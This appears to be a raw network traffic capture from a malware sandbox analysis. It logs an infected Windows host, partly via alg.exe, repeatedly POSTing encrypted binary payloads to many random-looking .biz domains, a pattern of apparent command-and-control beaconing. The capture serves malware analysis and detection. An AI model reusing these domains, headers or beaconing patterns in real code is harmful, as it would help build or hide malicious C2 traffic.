Nov 18, 2024 09:58:37.118484020 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3f0cda68be9d6e59b637f8ac4276b646|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
111 | 192.168.2.7 | 50090 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:36.384373903 CET | 352 | OUT | POST /pnuofhgyvs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:36.384386063 CET | 842 | OUT | Data Raw: 49 9e a1 48 32 05 46 06 3e 03 00 00 89 95 46 54 61 0e f8 03 38 c4 23 51 49 1a 78 6f 14 a7 9c 7a d3 29 6c 60 d9 27 7e 59 9c 7b 0c d1 0a f9 e4 f8 cb 0d 63 af bf 16 30 60 ae ec 78 66 42 da 6d d1 45 91 31 0d e0 a4 31 a2 bc 6d 3f 68 12 f7 6d f7 52 e9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: IH2F>FTa8#QIxoz)l`'~Y{c0`xfBmE11m?hmRabFkv${,P^4&f$W35g1WdcFmL.s~9,|c`FyN56&,hM-YnrHKv$P#N2)?BQ@jU6nSVD
Nov 18, 2024 09:58:37.848440886 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=85116d0ba2c95ce3ff9014b5048d380e|155.94.241.187|1731920317|1731920317|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.7 | 50091 | 3.254.94.185 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:37.406847000 CET | 345 | OUT | POST /pwpf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:37.406868935 CET | 778 | OUT | Data Raw: 6f 89 2b 9e ad fc 8e 8d fe 02 00 00 d9 c3 40 40 30 9c 41 ed ad 97 3e 13 21 29 14 bc 0b 29 55 25 f5 f1 a8 38 4b 1b aa 15 f7 c7 c6 bd 9f 4d f2 d2 b4 29 99 90 20 89 92 e5 dc 93 fe ed 0a 8b 36 6b ca c4 32 bd 22 cd 17 65 02 28 13 42 6c f6 51 e1 fa 5c
Data Ascii: o+@@0A>!))U%8KM) 6k2"e(BlQ\8&9jSkJ=poOx;VkK,>G8Dd-Gn'W*P{Hq^qG_@908]s943+TKO}/(69
Nov 18, 2024 09:58:38.992995024 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5628032f0d3354b9d0c477bb36fc08fe|155.94.241.187|1731920318|1731920318|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
113 | 192.168.2.7 | 50092 | 13.251.16.150 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:37.873622894 CET | 355 | OUT | POST /hcvbujevnkcp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:37.873641968 CET | 842 | OUT | Data Raw: 3b c5 c7 4d c9 1f ec 8b 3e 03 00 00 e4 41 a0 49 38 e4 43 43 3e 8b 5a c9 ae 4c b4 71 2e 44 b4 dc 01 18 c1 90 93 cf e6 c6 b5 04 0d 93 80 4d ed da 68 b8 6d 86 37 d9 1b 50 fa 95 a7 ec b4 0a a1 ab fa 17 34 3f 46 b6 d5 94 b5 4f 80 ce 41 65 83 74 e9 b2
Data Ascii: ;M>AI8CC>ZLq.DMhm7P4?FOAetk1PGzU6ADsCAD)E=&$d:`1YC519Cqqo3ged+qln!6rm7o-e
Nov 18, 2024 09:58:39.292785883 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=93e6100055fef32f2f724e8e4d4672d1|155.94.241.187|1731920319|1731920319|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
114 | 192.168.2.7 | 50093 | 34.211.97.45 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:39.455161095 CET | 354 | OUT | POST /sksexgcippwxc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:39.455161095 CET | 842 | OUT | Data Raw: 5c 9e a6 12 78 bb 43 a3 3e 03 00 00 65 8c 0d b2 8a c0 03 c0 90 e9 ef b0 c2 ef 2d 2f 49 41 a1 15 8c 5c 73 92 fe 6c f4 7b d6 b5 16 47 d1 d8 df cd dc 42 8c e1 d7 46 c1 03 f0 20 b2 c1 4c a3 f2 9d 70 18 19 03 d7 a7 46 09 76 9d 2a 21 b4 f4 0e 23 13 ef
Data Ascii: \xC>e-/IA\sl{GBF LpFv*!#)C3<Z5%/]:HpF`#3Z,u=Dw{v-pC}uW_gA2EGyGs&o/C|GWt2x5OS|7Zjkq\grwJ`
Nov 18, 2024 09:58:40.271845102 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=768bb14553bdbc40a80950a7276e7960|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      115192.168.2.75009418.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.772481918 CET354OUTPOST /esxyeqyttv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:39.772495985 CET | 778 | OUT | Data Raw: d2 d3 15 2a 4e ea 6e 86 fe 02 00 00 9c 97 94 8c cf 7f 25 5b cf ac a7 f6 7e 58 ec 8d bd 54 49 61 19 88 23 18 34 13 5b 16 fb ec aa de 7a f0 d6 32 a0 ea 5e fb ae da 92 32 3f bf f8 3d 92 3d 75 8f f8 79 8e 6d cd a0 0c 27 42 96 cb 9e 14 81 0a fc 67 54
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *Nn%[~XTIa#4[z2^2?==uym'BgTi?AW\rF)SEW~N8fNXi>~&2tCgL=^O6MJhC(<I+N]P;SLTH&=>.vs,z_KdDWlP\
Nov 18, 2024 09:58:41.233534098 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=940dae1772f7d066f75a3aca098ff79c|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.7 | 50095 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:40.449894905 CET | 347 | OUT | POST /rq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:40.449918032 CET | 842 | OUT | Data Raw: 50 77 4f 8f 6c 2d 52 5b 3e 03 00 00 a8 fe 3a 5e 0d f6 12 c7 c9 b1 09 02 5f f0 d1 bb 9e c2 32 97 ae c1 f5 fb e0 1e 18 c9 a6 99 04 de 2b 04 91 2e ef 71 bd d4 32 4c f2 da c0 08 36 3b 49 bb 50 76 f9 2c bd c3 17 44 43 92 f6 23 cd 89 e0 92 65 3a a0 a9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: PwOl-R[>:^_2+.q2L6;IPv,DC#e:U+DKVzuVZ4l7:qpXD@|l<+5^4^Aq:cBhT=@G&Dgltk5.C8j_:B`07^uw!Mzq
Nov 18, 2024 09:58:41.069847107 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e2efb71e53d6d61684e94eba3c22e86d|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.7 | 50096 | 18.246.231.120 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:41.087790012 CET | 351 | OUT | POST /vjmsosrx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:41.087804079 CET | 842 | OUT | Data Raw: 47 99 ff ac 36 58 67 c8 3e 03 00 00 ab 0c 37 4f 90 ba 25 08 4a c6 6a b7 8c 50 15 5d 5c 79 84 7d 5e c0 cc 4c 3f f6 23 33 9b 3b 07 f8 ae 1c 08 3b de b1 dc b7 55 c3 08 b3 22 10 c0 20 3b a6 a8 e1 df 66 c9 e4 6e 71 a2 c6 48 14 ed 42 ed e1 a5 a4 c2 23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G6Xg>7O%JjP]\y}^L?#3;;U" ;fnqHB#u@SwX.@m)a~4os {*\)mZ8T{`ho%qSR2eKx6hEhbWCPV.sdjYt8a9UUM=-hBx)C^B
Nov 18, 2024 09:58:41.931822062 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5eba12e007d684ed245439dc9cec7995|155.94.241.187|1731920321|1731920321|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.7 | 50097 | 34.246.200.160 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:41.597793102 CET | 358 | OUT | POST /poiwrabuiumompma HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:41.597809076 CET | 778 | OUT | Data Raw: 6e 92 cc 22 40 f3 68 4e fe 02 00 00 cf d1 6a ff 17 2a 05 eb e2 4c 05 26 36 5c e9 fa 9d b1 92 3e e2 99 7a 4d 16 94 85 5b 38 cf 94 42 fc a5 d4 07 26 45 51 80 99 de 70 2d c6 2d 3e c7 49 eb 1b b9 70 08 eb cb a3 ac be d0 ba 45 a6 b7 cd 2a 33 a4 e3 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: n"@hNj*L&6\>zM[8B&EQp-->IpE*3obUsf5`[2,T^h?KM+'!efmp;/]%&}X=iF$BSoBTOrq#i-k6,LAK+P8p.-^NYaS(}{#tLX4
Nov 18, 2024 09:58:42.557470083 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3e2726d9177816938f04a1e1b6af4113|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.7 | 50098 | 3.254.94.185 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:42.046660900 CET | 346 | OUT | POST /vtpac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:42.046684980 CET | 842 | OUT | Data Raw: a4 ff ad 13 7c a1 84 97 3e 03 00 00 aa 3d 11 e8 7a cf b7 77 89 78 ae 91 91 3c ae 1c b0 4d 51 5b a7 90 a2 3b 2a c0 5d 97 e3 f3 e1 13 dc 80 ca 6d 38 c4 ee 79 b0 fb 33 ee 64 9a 36 b6 d6 b4 e4 e5 62 1e 36 78 c7 58 20 45 29 2e 87 34 16 12 b3 f1 f3 90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: |>=zwx<MQ[;*]m8y3d6b6xX E).43_F(M\CC2O5?XKkC:6rxd@@~@CM6T-#gq16RrBs"K$.;B<_l5J'4z%lt
Nov 18, 2024 09:58:43.022830009 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=108606763fec2d8bbb0bb0190295332c|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.7 | 50099 | 47.129.31.212 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:42.819463968 CET | 347 | OUT | POST /sv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:42.819489002 CET | 778 | OUT | Data Raw: 43 e0 8a bd 7f 53 fe 3b fe 02 00 00 e1 06 d9 2e ce af bc 99 41 41 b6 33 b6 00 83 da 5a 39 44 75 4a 50 b8 21 82 4f cb 37 51 9f 45 f8 f6 90 19 e5 1b a7 7f 29 66 14 5b cc 4a 66 57 62 d2 e6 44 60 cb d2 7a d2 39 b5 19 9b 39 dc 1f 3d 1a 7f d4 47 80 22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CS;.AA3Z9DuJP!O7QE)f[JfWbD`z99=G"\6[V08Ft@v|$Bs 0+jjY/4=<o v&5\n1D8DDj[4VZ[`;#9?FLYmU1JI)qo3:
Nov 18, 2024 09:58:44.301110029 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7f12992277f465d4c5c8385f9cf3dd13|155.94.241.187|1731920324|1731920324|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
121 | 192.168.2.7 | 50100 | 85.214.228.140 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:43.042354107 CET | 346 | OUT | POST /oq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:43.042397022 CET | 842 | OUT | Data Raw: 31 2f 16 70 21 ff 00 e1 3e 03 00 00 06 db 22 51 94 a1 d2 df 67 ef b1 67 4f 95 c0 f7 d3 fd 72 02 2d ec 3f ec 01 9f a4 21 f7 8b f4 22 c6 66 a4 6c da 07 8e b6 00 02 50 66 5f ac 27 64 5f d2 0b 56 15 04 08 73 5a c5 52 8a 45 56 85 ad cd 2b 78 a1 67 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1/p!>"QggOr-?!"flPf_'d_VsZREV+xgqE'el+aWTRax<4&GT!'9\KY84:&wr?lBBx?;!cEYHz;!N=)~SI}/c`]!Cp+U_F}r$ib
Nov 18, 2024 09:58:43.921344042 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found
Nov 18, 2024 09:58:43.923193932 CET | 360 | OUT | POST /nurhntuqrhttbayt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
